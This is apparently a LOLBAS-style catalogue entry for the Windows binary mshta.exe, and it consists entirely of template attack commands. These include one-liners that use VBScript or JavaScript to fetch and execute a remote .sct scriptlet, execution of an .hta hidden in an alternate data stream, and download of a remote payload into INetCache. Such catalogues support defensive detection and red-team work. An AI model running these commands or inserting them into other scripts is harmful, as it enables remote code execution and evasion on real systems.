Used by Windows to execute html applications. (.hta)
Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
mshta.exe {PATH:.hta}
Execute code
Executes VBScript supplied as a command line argument.
mshta.exe vbscript:Close(Execute("GetObject(""script:{REMOTEURL:.sct}"")"))
Execute code
Executes JavaScript supplied as a command line argument.
mshta.exe javascript:a=GetObject("script:{REMOTEURL:.sct}").Exec();close();
Execute code
Opens the target .HTA and executes embedded JavaScript, JScript, or VBScript.
mshta.exe "{PATH_ABSOLUTE}:file.hta"
Execute code hidden in alternate data stream
It will download a remote payload and place it in INetCache.
mshta.exe {REMOTEURL}
Downloads payload from remote server